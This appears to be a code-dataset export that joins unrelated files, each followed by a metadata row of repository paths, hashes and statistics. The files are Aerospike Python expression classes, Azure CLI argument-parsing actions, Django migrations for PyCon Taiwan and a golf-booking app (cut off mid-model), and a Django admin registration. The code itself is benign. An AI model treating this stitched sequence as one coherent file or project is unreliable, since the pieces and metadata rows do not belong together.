            bin if isinstance(bin, _BaseExpr) else ListBin(bin)
        )
        self._fixed = {_Keys.RETURN_TYPE_KEY: return_type}
        if ctx is not None:
            self._fixed[_Keys.CTX_KEY] = ctx
class ListGetByValueRelRankRangeToEnd(_BaseExpr):
    """Create an expression that selects list items nearest to value and greater by relative rank."""
    _op = aerospike.OP_LIST_GET_BY_VALUE_RANK_RANGE_REL_TO_END

    def __init__(self, ctx: TypeCTX, return_type: int, value: TypeValue, rank: TypeRank, bin: TypeBinName):
        """ Args:
            ctx (TypeCTX): An optional list of nested CDT :mod:`cdt_ctx <aerospike_helpers.cdt_ctx>` context operation objects.
            return_type (int): Value specifying what should be returned from the operation.
                This should be one of the :ref:`list_return_types` values.
            value (TypeValue): Value or value expression to get items relative to.
            rank (TypeRank): Rank integer expression. rank relative to "value" to start getting elements.
            bin (TypeBinName): bin expression, such as :class:`~aerospike_helpers.expressions.base.MapBin` or :class:`~aerospike_helpers.expressions.base.ListBin`.

        :return: Expression.

        Example::

            # Get the values of all elements in list bin "a" larger than 3.
            expr = exp.ListGetByValueRelRankRangeToEnd(None, aerospike.LIST_RETURN_VALUE, 3, 1, exp.ListBin("a")).compile()
        """
        self._children = (
            value,
            rank,
            bin if isinstance(bin, _BaseExpr) else ListBin(bin)
        )
        self._fixed = {_Keys.RETURN_TYPE_KEY: return_type}
        if ctx is not None:
            self._fixed[_Keys.CTX_KEY] = ctx
class ListGetByValueRelRankRange(_BaseExpr):
    """ Create an expression that selects list items nearest to value and greater by relative rank with a
        count limit and returns selected data specified by return_type.
    """
    _op = aerospike.OP_LIST_GET_BY_VALUE_RANK_RANGE_REL

    def __init__(self, ctx: TypeCTX, return_type: int, value: TypeValue, rank: TypeRank, count: TypeCount, bin: TypeBinName):
        """ Args:
            ctx (TypeCTX): An optional list of nested CDT :mod:`cdt_ctx <aerospike_helpers.cdt_ctx>` context operation objects.
            return_type (int): Value specifying what should be returned from the operation.
                This should be one of the :ref:`list_return_types` values.
            value (TypeValue): Value or value expression to get items relative to.
            rank (TypeRank): Rank integer expression. rank relative to "value" to start getting elements.
            count (TypeCount): Integer value or integer value expression, how many elements to get.
            bin (TypeBinName): bin expression, such as :class:`~aerospike_helpers.expressions.base.MapBin` or :class:`~aerospike_helpers.expressions.base.ListBin`.

        :return: Expression.

        Example::

            # Get the next 2 values in list bin "a" larger than 3.
            expr = exp.ListGetByValueRelRankRange(None, aerospike.LIST_RETURN_VALUE, 3, 1, 2, exp.ListBin("a")).compile()
        """
        self._children = (
            value,
            rank,
            count,
            bin if isinstance(bin, _BaseExpr) else ListBin(bin)
        )
        self._fixed = {_Keys.RETURN_TYPE_KEY: return_type}
        if ctx is not None:
            self._fixed[_Keys.CTX_KEY] = ctx
class ListGetByIndex(_BaseExpr):
    """ Create an expression that selects list item identified by index
        and returns selected data specified by return_type.
    """
    _op = aerospike.OP_LIST_GET_BY_INDEX

    def __init__(
        self,
        ctx: TypeCTX,
        return_type: int,
        value_type: int,
        index: TypeIndex,
        bin: TypeBinName,
    ):
        """ Args:
            ctx (TypeCTX): An optional list of nested CDT :mod:`cdt_ctx <aerospike_helpers.cdt_ctx>` context operation objects.
            return_type (int): Value specifying what should be returned from the operation.
                This should be one of the :ref:`list_return_types` values.
            value_type (int): The value type that will be returned by this expression (ResultType).
            index (TypeIndex): Integer or integer expression of index to get element at.
            bin (TypeBinName): bin expression, such as :class:`~aerospike_helpers.expressions.base.MapBin` or :class:`~aerospike_helpers.expressions.base.ListBin`.

        :return: Expression.

        Example::

            # Get the value at index 0 in list bin "a". (assume this value is an integer)
            expr = exp.ListGetByIndex(None, aerospike.LIST_RETURN_VALUE, aerospike.ResultType.INTEGER, 0, exp.ListBin("a")).compile()
        """
        self._children = (
            index,
            bin if isinstance(bin, _BaseExpr) else ListBin(bin)
        )
        self._fixed = {_Keys.VALUE_TYPE_KEY: value_type, _Keys.RETURN_TYPE_KEY: return_type}
        if ctx is not None:
            self._fixed[_Keys.CTX_KEY] = ctx
class ListGetByIndexRangeToEnd(_BaseExpr):
    """ Create an expression that selects list items starting at specified index to the end of list
        and returns selected data specified by return_type.
    """
    _op = aerospike.OP_LIST_GET_BY_INDEX_RANGE_TO_END

    def __init__(self, ctx: TypeCTX, return_type: int, index: TypeIndex, bin: TypeBinName):
        """ Args:
            ctx (TypeCTX): An optional list of nested CDT :mod:`cdt_ctx <aerospike_helpers.cdt_ctx>` context operation objects.
            return_type (int): Value specifying what should be returned from the operation.
                This should be one of the :ref:`list_return_types` values.
            index (TypeIndex): Integer or integer expression of index to start getting elements at.
            bin (TypeBinName): bin expression, such as :class:`~aerospike_helpers.expressions.base.MapBin` or :class:`~aerospike_helpers.expressions.base.ListBin`.

        :return: Expression.

        Example::

            # Get element 5 to end from list bin "a".
            expr = exp.ListGetByIndexRangeToEnd(None, aerospike.LIST_RETURN_VALUE, 5, exp.ListBin("a")).compile()
        """
        # A raw bin name is wrapped in a ListBin expression; expressions pass through.
        bin_expr = bin if isinstance(bin, _BaseExpr) else ListBin(bin)
        self._children = (index, bin_expr)
        fixed = {_Keys.RETURN_TYPE_KEY: return_type}
        if ctx is not None:
            fixed[_Keys.CTX_KEY] = ctx
        self._fixed = fixed
class ListGetByIndexRange(_BaseExpr):
    """ Create an expression that selects "count" list items starting at specified index
        and returns selected data specified by return_type.
    """
    _op = aerospike.OP_LIST_GET_BY_INDEX_RANGE

    def __init__(self, ctx: TypeCTX, return_type: int, index: TypeIndex, count: TypeCount, bin: TypeBinName):
        """ Args:
            ctx (TypeCTX): An optional list of nested CDT :mod:`cdt_ctx <aerospike_helpers.cdt_ctx>` context operation objects.
            return_type (int): Value specifying what should be returned from the operation.
                This should be one of the :ref:`list_return_types` values.
            index (TypeIndex): Integer or integer expression of index to start getting elements at.
            count (TypeCount): Integer or integer expression for count of elements to get.
            bin (TypeBinName): bin expression, such as :class:`~aerospike_helpers.expressions.base.MapBin` or :class:`~aerospike_helpers.expressions.base.ListBin`.

        :return: Expression.

        Example::

            # Get elements at indexes 3, 4, 5, 6 in list bin "a".
            expr = exp.ListGetByIndexRange(None, aerospike.LIST_RETURN_VALUE, 3, 4, exp.ListBin("a")).compile()
        """
        # A raw bin name is wrapped in a ListBin expression; expressions pass through.
        bin_expr = bin if isinstance(bin, _BaseExpr) else ListBin(bin)
        self._children = (index, count, bin_expr)
        fixed = {_Keys.RETURN_TYPE_KEY: return_type}
        if ctx is not None:
            fixed[_Keys.CTX_KEY] = ctx
        self._fixed = fixed
class ListGetByRank(_BaseExpr):
    """ Create an expression that selects list item identified by rank
        and returns selected data specified by return_type.
    """
    _op = aerospike.OP_LIST_GET_BY_RANK

    def __init__(
        self,
        ctx: TypeCTX,
        return_type: int,
        value_type: int,
        rank: TypeRank,
        bin: TypeBinName,
    ):
        """ Args:
            ctx (TypeCTX): An optional list of nested CDT :mod:`cdt_ctx <aerospike_helpers.cdt_ctx>` context operation objects.
            return_type (int): Value specifying what should be returned from the operation.
                This should be one of the :ref:`list_return_types` values.
            value_type (int): The value type that will be returned by this expression (ResultType).
            rank (TypeRank): Rank integer or integer expression of element to get.
            bin (TypeBinName): bin expression, such as :class:`~aerospike_helpers.expressions.base.MapBin` or :class:`~aerospike_helpers.expressions.base.ListBin`.

        :return: Expression.

        Example::

            # Get the smallest element in list bin "a".
            expr = exp.ListGetByRank(None, aerospike.LIST_RETURN_VALUE, aerospike.ResultType.INTEGER, 0, exp.ListBin("a")).compile()
        """
        # A raw bin name is wrapped in a ListBin expression; expressions pass through.
        bin_expr = bin if isinstance(bin, _BaseExpr) else ListBin(bin)
        self._children = (rank, bin_expr)
        fixed = {_Keys.VALUE_TYPE_KEY: value_type, _Keys.RETURN_TYPE_KEY: return_type}
        if ctx is not None:
            fixed[_Keys.CTX_KEY] = ctx
        self._fixed = fixed
class ListGetByRankRangeToEnd(_BaseExpr):
    """ Create an expression that selects list items starting at specified rank to the last ranked item
        and returns selected data specified by return_type.
    """
    _op = aerospike.OP_LIST_GET_BY_RANK_RANGE_TO_END

    def __init__(self, ctx: TypeCTX, return_type: int, rank: TypeRank, bin: TypeBinName):
        """ Args:
            ctx (TypeCTX): An optional list of nested CDT :mod:`cdt_ctx <aerospike_helpers.cdt_ctx>` context operation objects.
            return_type (int): Value specifying what should be returned from the operation.
                This should be one of the :ref:`list_return_types` values.
            rank (TypeRank): Rank integer or integer expression of first element to get.
            bin (TypeBinName): bin expression, such as :class:`~aerospike_helpers.expressions.base.MapBin` or :class:`~aerospike_helpers.expressions.base.ListBin`.

        :return: Expression.

        Example::

            # Get the three largest elements in list bin "a".
            expr = exp.ListGetByRankRangeToEnd(None, aerospike.LIST_RETURN_VALUE, -3, exp.ListBin("a")).compile()
        """
        # A raw bin name is wrapped in a ListBin expression; expressions pass through.
        bin_expr = bin if isinstance(bin, _BaseExpr) else ListBin(bin)
        self._children = (rank, bin_expr)
        fixed = {_Keys.RETURN_TYPE_KEY: return_type}
        if ctx is not None:
            fixed[_Keys.CTX_KEY] = ctx
        self._fixed = fixed
class ListGetByRankRange(_BaseExpr):
    """ Create an expression that selects "count" list items starting at specified rank
        and returns selected data specified by return_type.
    """
    _op = aerospike.OP_LIST_GET_BY_RANK_RANGE

    def __init__(self, ctx: TypeCTX, return_type: int, rank: TypeRank, count: TypeCount, bin: TypeBinName):
        """ Args:
            ctx (TypeCTX): An optional list of nested CDT :mod:`cdt_ctx <aerospike_helpers.cdt_ctx>` context operation objects.
            return_type (int): Value specifying what should be returned from the operation.
                This should be one of the :ref:`list_return_types` values.
            rank (TypeRank): Rank integer or integer expression of first element to get.
            count (TypeCount): Count integer or integer expression for how many elements to get.
            bin (TypeBinName): bin expression, such as :class:`~aerospike_helpers.expressions.base.MapBin` or :class:`~aerospike_helpers.expressions.base.ListBin`.

        :return: Expression.

        Example::

            # Get the 3 smallest elements in list bin "a".
            expr = exp.ListGetByRankRange(None, aerospike.LIST_RETURN_VALUE, 0, 3, exp.ListBin("a")).compile()
        """
        # A raw bin name is wrapped in a ListBin expression; expressions pass through.
        bin_expr = bin if isinstance(bin, _BaseExpr) else ListBin(bin)
        self._children = (rank, count, bin_expr)
        fixed = {_Keys.RETURN_TYPE_KEY: return_type}
        if ctx is not None:
            fixed[_Keys.CTX_KEY] = ctx
        self._fixed = fixed
| 44.009597 | 180 | 0.62748 | 5,447 | 45,858 | 5.10593 | 0.054158 | 0.059255 | 0.066985 | 0.070221 | 0.864087 | 0.846721 | 0.80059 | 0.775061 | 0.755393 | 0.728067 | 0 | 0.003799 | 0.276767 | 45,858 | 1,041 | 181 | 44.051873 | 0.834771 | 0.556631 | 0 | 0.635171 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.081365 | false | 0 | 0.028871 | 0 | 0.272966 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
3146195b876889be4607d2c4e85f93e3654c3441 | 130 | py | Python | src/dataset/__init__.py | ae-foster/cresp | 0215842370d3d665133a496d6d971a537400c674 | [
"MIT"
] | 5 | 2021-11-15T22:49:47.000Z | 2022-02-05T01:39:54.000Z | src/dataset/__init__.py | ae-foster/cresp | 0215842370d3d665133a496d6d971a537400c674 | [
"MIT"
] | null | null | null | src/dataset/__init__.py | ae-foster/cresp | 0215842370d3d665133a496d6d971a537400c674 | [
"MIT"
] | null | null | null | from .r2n2 import R2N2
from .one_dim_functions import *
from .snooker import *
from .collator import *
from .augmentation import * | 26 | 32 | 0.784615 | 18 | 130 | 5.555556 | 0.5 | 0.3 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.036036 | 0.146154 | 130 | 5 | 33 | 26 | 0.864865 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
31aa6ac57e77f8021d0f0e53902b0489b424026f | 6,505 | py | Python | src/monitor-control-service/azext_amcs/manual/action.py | haroonf/azure-cli-extensions | 61c044d34c224372f186934fa7c9313f1cd3a525 | [
"MIT"
] | 207 | 2017-11-29T06:59:41.000Z | 2022-03-31T10:00:53.000Z | src/monitor-control-service/azext_amcs/manual/action.py | haroonf/azure-cli-extensions | 61c044d34c224372f186934fa7c9313f1cd3a525 | [
"MIT"
] | 4,061 | 2017-10-27T23:19:56.000Z | 2022-03-31T23:18:30.000Z | src/monitor-control-service/azext_amcs/manual/action.py | haroonf/azure-cli-extensions | 61c044d34c224372f186934fa7c9313f1cd3a525 | [
"MIT"
] | 802 | 2017-10-11T17:36:26.000Z | 2022-03-31T22:24:32.000Z | # coding=utf-8
# --------------------------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# --------------------------------------------------------------------------------------------
# pylint: disable=protected-access
import argparse
from collections import defaultdict
from azure.cli.core.azclierror import ValidationError
class AddDataFlows(argparse._AppendAction):
    """argparse append action that parses repeated KEY=VALUE tokens into a data-flow dict."""

    def __call__(self, parser, namespace, values, option_string=None):
        parsed = self.get_action(values, option_string)
        super(AddDataFlows, self).__call__(parser, namespace, parsed, option_string)

    def get_action(self, values, option_string):  # pylint: disable=no-self-use
        """Group KEY=VALUE tokens by key and map recognized keys to a data-flow dict.

        Recognized keys (case-insensitive): ``streams``, ``destinations``; each maps
        to the list of all values supplied for that key. Unrecognized keys are ignored.
        Raises ValidationError when a token has no '='.
        """
        try:
            grouped = defaultdict(list)
            for token in values:
                key, value = token.split('=', 1)
                grouped[key].append(value)
            grouped = dict(grouped)
        except ValueError:
            raise ValidationError('{} [KEY=VALUE ...]'.format(option_string))
        result = {}
        for key, parts in grouped.items():
            lowered = key.lower()
            if lowered == 'streams':
                result['streams'] = parts
            elif lowered == 'destinations':
                result['destinations'] = parts
        return result
class AddDestinationsLogAnalytics(argparse._AppendAction):
    """argparse append action that parses KEY=VALUE tokens into a Log Analytics destination."""

    def __call__(self, parser, namespace, values, option_string=None):
        parsed = self.get_action(values, option_string)
        super(AddDestinationsLogAnalytics, self).__call__(parser, namespace, parsed, option_string)

    def get_action(self, values, option_string):  # pylint: disable=no-self-use
        """Map ``resource-id`` / ``name`` KEY=VALUE tokens to a destination dict.

        Only the first value supplied for each recognized key is used; unrecognized
        keys are ignored. Raises ValidationError when a token has no '='.
        """
        try:
            grouped = defaultdict(list)
            for token in values:
                key, value = token.split('=', 1)
                grouped[key].append(value)
            grouped = dict(grouped)
        except ValueError:
            raise ValidationError('{} [KEY=VALUE ...]'.format(option_string))
        result = {}
        for key, parts in grouped.items():
            lowered = key.lower()
            if lowered == 'resource-id':
                result['workspace_resource_id'] = parts[0]
            elif lowered == 'name':
                result['name'] = parts[0]
        return result
class AddDestinationsAzureMonitorMetrics(argparse.Action):
    """argparse action that parses KEY=VALUE tokens into an Azure Monitor metrics destination."""

    def __call__(self, parser, namespace, values, option_string=None):
        # Single-valued action: store the parsed dict directly on the namespace.
        namespace.destinations_azure_monitor_metrics = self.get_action(values, option_string)

    def get_action(self, values, option_string):  # pylint: disable=no-self-use
        """Map a ``name`` KEY=VALUE token to a destination dict.

        Only the first value for ``name`` is used; other keys are ignored.
        Raises ValidationError when a token has no '='.
        """
        try:
            grouped = defaultdict(list)
            for token in values:
                key, value = token.split('=', 1)
                grouped[key].append(value)
            grouped = dict(grouped)
        except ValueError:
            raise ValidationError('{} [KEY=VALUE ...]'.format(option_string))
        result = {}
        for key, parts in grouped.items():
            if key.lower() == 'name':
                result['name'] = parts[0]
        return result
class AddDataSourcesPerformanceCounters(argparse._AppendAction):
    """argparse append action that parses KEY=VALUE tokens into a performance-counter data source."""

    def __call__(self, parser, namespace, values, option_string=None):
        parsed = self.get_action(values, option_string)
        super(AddDataSourcesPerformanceCounters, self).__call__(parser, namespace, parsed, option_string)

    def get_action(self, values, option_string):  # pylint: disable=no-self-use
        """Map KEY=VALUE tokens to a performance-counter data-source dict.

        Recognized keys: ``streams`` and ``counter-specifiers`` (multi-valued),
        ``sampling-frequency`` (int, first value) and ``name`` (first value).
        Raises ValidationError on a token without '=' or a non-integer frequency.
        """
        try:
            grouped = defaultdict(list)
            for token in values:
                key, value = token.split('=', 1)
                grouped[key].append(value)
            grouped = dict(grouped)
        except ValueError:
            raise ValidationError('{} [KEY=VALUE ...]'.format(option_string))
        result = {}
        for key, parts in grouped.items():
            lowered = key.lower()
            if lowered == 'streams':
                result['streams'] = parts
            elif lowered == 'sampling-frequency':
                try:
                    result['sampling_frequency_in_seconds'] = int(parts[0])
                except ValueError:
                    raise ValidationError('invalid sampling-frequency={}'.format(parts[0]))
            elif lowered == 'counter-specifiers':
                result['counter_specifiers'] = parts
            elif lowered == 'name':
                result['name'] = parts[0]
        return result
class AddDataSourcesWindowsEventLogs(argparse._AppendAction):
    """argparse append action that parses KEY=VALUE tokens into a Windows event log data source."""

    def __call__(self, parser, namespace, values, option_string=None):
        parsed = self.get_action(values, option_string)
        super(AddDataSourcesWindowsEventLogs, self).__call__(parser, namespace, parsed, option_string)

    def get_action(self, values, option_string):  # pylint: disable=no-self-use
        """Map KEY=VALUE tokens to a Windows-event-log data-source dict.

        Recognized keys: ``streams`` and ``x-path-queries`` (multi-valued),
        ``name`` (first value). Raises ValidationError when a token has no '='.
        """
        try:
            grouped = defaultdict(list)
            for token in values:
                key, value = token.split('=', 1)
                grouped[key].append(value)
            grouped = dict(grouped)
        except ValueError:
            raise ValidationError('{} [KEY=VALUE ...]'.format(option_string))
        result = {}
        for key, parts in grouped.items():
            lowered = key.lower()
            if lowered == 'streams':
                result['streams'] = parts
            elif lowered == 'x-path-queries':
                result['x_path_queries'] = parts
            elif lowered == 'name':
                result['name'] = parts[0]
        return result
class AddDataSourcesSyslog(argparse._AppendAction):
    """argparse append action that parses KEY=VALUE tokens into a syslog data source."""

    def __call__(self, parser, namespace, values, option_string=None):
        parsed = self.get_action(values, option_string)
        super(AddDataSourcesSyslog, self).__call__(parser, namespace, parsed, option_string)

    def get_action(self, values, option_string):  # pylint: disable=no-self-use
        """Map KEY=VALUE tokens to a syslog data-source dict.

        Recognized keys: ``streams``, ``facility-names`` and ``log-levels``
        (multi-valued), ``name`` (first value). Raises ValidationError when a
        token has no '='.
        """
        try:
            grouped = defaultdict(list)
            for token in values:
                key, value = token.split('=', 1)
                grouped[key].append(value)
            grouped = dict(grouped)
        except ValueError:
            raise ValidationError('{} [KEY=VALUE ...]'.format(option_string))
        result = {}
        for key, parts in grouped.items():
            lowered = key.lower()
            if lowered == 'streams':
                result['streams'] = parts
            elif lowered == 'facility-names':
                result['facility_names'] = parts
            elif lowered == 'log-levels':
                result['log_levels'] = parts
            elif lowered == 'name':
                result['name'] = parts[0]
        return result
| 39.186747 | 105 | 0.554035 | 681 | 6,505 | 5.140969 | 0.14978 | 0.0994 | 0.092545 | 0.071979 | 0.741217 | 0.741217 | 0.741217 | 0.741217 | 0.741217 | 0.734647 | 0 | 0.003313 | 0.30392 | 6,505 | 165 | 106 | 39.424242 | 0.769876 | 0.08455 | 0 | 0.778571 | 0 | 0 | 0.076405 | 0.011949 | 0 | 0 | 0 | 0 | 0 | 1 | 0.085714 | false | 0 | 0.021429 | 0 | 0.192857 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
31e868189cd5c6e0402b5c20f980cee9a7de70cf | 1,573 | py | Python | src/proposals/migrations/0048_auto_20210130_2309.py | kaka-lin/pycon.tw | 67809a5e43b03273ac8d8f5a1b6b3d3f73474be7 | [
"MIT"
] | 47 | 2015-12-19T10:23:11.000Z | 2018-06-13T08:07:33.000Z | src/proposals/migrations/0048_auto_20210130_2309.py | kaka-lin/pycon.tw | 67809a5e43b03273ac8d8f5a1b6b3d3f73474be7 | [
"MIT"
] | 473 | 2018-12-01T13:01:48.000Z | 2022-03-30T07:10:42.000Z | src/proposals/migrations/0048_auto_20210130_2309.py | kaka-lin/pycon.tw | 67809a5e43b03273ac8d8f5a1b6b3d3f73474be7 | [
"MIT"
] | 91 | 2018-07-26T02:38:59.000Z | 2022-01-16T02:38:31.000Z | # Generated by Django 3.0.7 on 2021-01-30 15:09
from django.db import migrations, models
class Migration(migrations.Migration):
    # Auto-generated migration (makemigrations): updates the ``conference``
    # SlugField on three proposal models, adding the 'pycontw-2021' choice and
    # making it the new default. Code kept byte-identical to the generated form.

    dependencies = [
        ('proposals', '0047_auto_20200630_2342'),
    ]

    operations = [
        migrations.AlterField(
            model_name='additionalspeaker',
            name='conference',
            field=models.SlugField(choices=[('pycontw-2016', 'PyCon Taiwan 2016'), ('pycontw-2017', 'PyCon Taiwan 2017'), ('pycontw-2018', 'PyCon Taiwan 2018'), ('pycontw-2019', 'PyCon Taiwan 2019'), ('pycontw-2020', 'PyCon Taiwan 2020'), ('pycontw-2021', 'PyCon Taiwan 2021')], default='pycontw-2021', verbose_name='conference'),
        ),
        migrations.AlterField(
            model_name='talkproposal',
            name='conference',
            field=models.SlugField(choices=[('pycontw-2016', 'PyCon Taiwan 2016'), ('pycontw-2017', 'PyCon Taiwan 2017'), ('pycontw-2018', 'PyCon Taiwan 2018'), ('pycontw-2019', 'PyCon Taiwan 2019'), ('pycontw-2020', 'PyCon Taiwan 2020'), ('pycontw-2021', 'PyCon Taiwan 2021')], default='pycontw-2021', verbose_name='conference'),
        ),
        migrations.AlterField(
            model_name='tutorialproposal',
            name='conference',
            field=models.SlugField(choices=[('pycontw-2016', 'PyCon Taiwan 2016'), ('pycontw-2017', 'PyCon Taiwan 2017'), ('pycontw-2018', 'PyCon Taiwan 2018'), ('pycontw-2019', 'PyCon Taiwan 2019'), ('pycontw-2020', 'PyCon Taiwan 2020'), ('pycontw-2021', 'PyCon Taiwan 2021')], default='pycontw-2021', verbose_name='conference'),
        ),
    ]
| 54.241379 | 330 | 0.636364 | 170 | 1,573 | 5.835294 | 0.270588 | 0.199597 | 0.075605 | 0.087702 | 0.772177 | 0.772177 | 0.772177 | 0.772177 | 0.772177 | 0.772177 | 0 | 0.146897 | 0.190718 | 1,573 | 28 | 331 | 56.178571 | 0.632364 | 0.028608 | 0 | 0.545455 | 1 | 0 | 0.455439 | 0.015072 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.045455 | 0 | 0.181818 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
734d4ba54a9e6c40b30db5d211e60f625ac9e686 | 227 | py | Python | profiles_api/admin.py | Gunaksh-Joshi/profiles-rest-api | 9014651aad520f9c165baef321d8f2bba4e2a28a | [
"MIT"
] | null | null | null | profiles_api/admin.py | Gunaksh-Joshi/profiles-rest-api | 9014651aad520f9c165baef321d8f2bba4e2a28a | [
"MIT"
] | null | null | null | profiles_api/admin.py | Gunaksh-Joshi/profiles-rest-api | 9014651aad520f9c165baef321d8f2bba4e2a28a | [
"MIT"
] | null | null | null | from django.contrib import admin
"""import models from models"""
from profiles_api import models
"""Register models which we have created"""
admin.site.register(models.UserProfile)
admin.site.register(models.ProfileFeedItem)
| 25.222222 | 43 | 0.801762 | 30 | 227 | 6.033333 | 0.533333 | 0.232044 | 0.187845 | 0.254144 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.096916 | 227 | 8 | 44 | 28.375 | 0.882927 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.5 | 0 | 0.5 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 6 |
c340d1d594a5cfb06c6c1a78a88d01360de1c513 | 23,706 | py | Python | booking/migrations/0001_initial.py | pincoin/withthai-old | 10e6248f14faba4c4ce3e387e93e28dabb76a2f7 | [
"MIT"
] | null | null | null | booking/migrations/0001_initial.py | pincoin/withthai-old | 10e6248f14faba4c4ce3e387e93e28dabb76a2f7 | [
"MIT"
] | 3 | 2021-03-30T12:56:11.000Z | 2021-09-22T18:47:42.000Z | booking/migrations/0001_initial.py | pincoin/withthai-old | 10e6248f14faba4c4ce3e387e93e28dabb76a2f7 | [
"MIT"
] | null | null | null | # Generated by Django 3.0.7 on 2020-06-18 15:20
import booking.models
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
import django.utils.timezone
import easy_thumbnails.fields
import model_utils.fields
import uuid
class Migration(migrations.Migration):
initial = True
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
]
operations = [
migrations.CreateModel(
name='Area',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created', model_utils.fields.AutoCreatedField(default=django.utils.timezone.now, editable=False, verbose_name='created')),
('modified', model_utils.fields.AutoLastModifiedField(default=django.utils.timezone.now, editable=False, verbose_name='modified')),
('title_english', models.CharField(max_length=255, verbose_name='Area english name')),
('title_thai', models.CharField(max_length=255, verbose_name='Area Thai name')),
('title_korean', models.CharField(max_length=255, verbose_name='Area Korean name')),
('slug', models.SlugField(allow_unicode=True, help_text='A short label containing only letters, numbers, underscores or hyphens for URL', max_length=255, unique=True, verbose_name='Slug')),
('position', models.IntegerField(db_index=True, default=0, verbose_name='Position')),
],
options={
'verbose_name': 'Area',
'verbose_name_plural': 'Areas',
},
),
migrations.CreateModel(
name='Asset',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created', model_utils.fields.AutoCreatedField(default=django.utils.timezone.now, editable=False, verbose_name='created')),
('modified', model_utils.fields.AutoLastModifiedField(default=django.utils.timezone.now, editable=False, verbose_name='modified')),
('code', models.IntegerField(choices=[(0, 'GB prime pay'), (1, 'Petty cash'), (2, 'Passbook Krungsri'), (3, 'Passbook Kasikorn')], db_index=True, default=0, verbose_name='Asset code')),
('title', models.CharField(max_length=255, verbose_name='Asset name')),
('balance', models.DecimalField(decimal_places=0, max_digits=11, verbose_name='Asset balance')),
],
options={
'verbose_name': 'Asset',
'verbose_name_plural': 'Assets',
},
),
migrations.CreateModel(
name='Club',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created', model_utils.fields.AutoCreatedField(default=django.utils.timezone.now, editable=False, verbose_name='created')),
('modified', model_utils.fields.AutoLastModifiedField(default=django.utils.timezone.now, editable=False, verbose_name='modified')),
('title_english', models.CharField(db_index=True, max_length=255, verbose_name='Golf club English name')),
('title_thai', models.CharField(db_index=True, max_length=255, verbose_name='Golf club Thai name')),
('title_korean', models.CharField(db_index=True, max_length=255, verbose_name='Golf club Korean name')),
('slug', models.SlugField(allow_unicode=True, help_text='A short label containing only letters, numbers, underscores or hyphens for URL', max_length=255, unique=True, verbose_name='Slug')),
('phone', models.CharField(blank=True, max_length=32, null=True, verbose_name='Phone number')),
('email', models.EmailField(blank=True, max_length=255, null=True, verbose_name='Email address')),
('fax', models.CharField(blank=True, max_length=16, null=True, verbose_name='Fax number')),
('website', models.URLField(blank=True, max_length=255, null=True, verbose_name='Website')),
('address', models.CharField(blank=True, max_length=255, null=True, verbose_name='Golf club address')),
('hole', models.IntegerField(choices=[(0, '18 Holes'), (1, '9 Holes'), (2, '27 Holes'), (3, '36 Holes')], db_index=True, default=0, verbose_name='No. of holes')),
('country', models.IntegerField(choices=[(1, 'Thailand'), (2, 'South Korea'), (3, 'Japan'), (4, 'China')], db_index=True, default=1, verbose_name='Country code')),
('green_fee_selling_price', models.DecimalField(db_index=True, decimal_places=2, help_text='THB', max_digits=11, verbose_name='Start from')),
('caddie_fee_selling_price', models.DecimalField(db_index=True, decimal_places=2, help_text='THB', max_digits=11, verbose_name='Caddie fee')),
('cart_fee_selling_price', models.DecimalField(db_index=True, decimal_places=2, help_text='THB', max_digits=11, verbose_name='Cart fee')),
('max_pax', models.IntegerField(default=4, verbose_name='Max PAX')),
('cart_required', models.IntegerField(db_index=True, default=0, verbose_name='Require golf cart')),
('weekdays_min_in_advance', models.IntegerField(db_index=True, default=1, verbose_name='Weekdays minimum in advance')),
('weekdays_max_in_advance', models.IntegerField(db_index=True, default=30, verbose_name='Weekdays maximum in advance')),
('weekend_min_in_advance', models.IntegerField(db_index=True, default=1, verbose_name='Weekend minimum in advance')),
('weekend_max_in_advance', models.IntegerField(db_index=True, default=7, verbose_name='Weekend maximum in advance')),
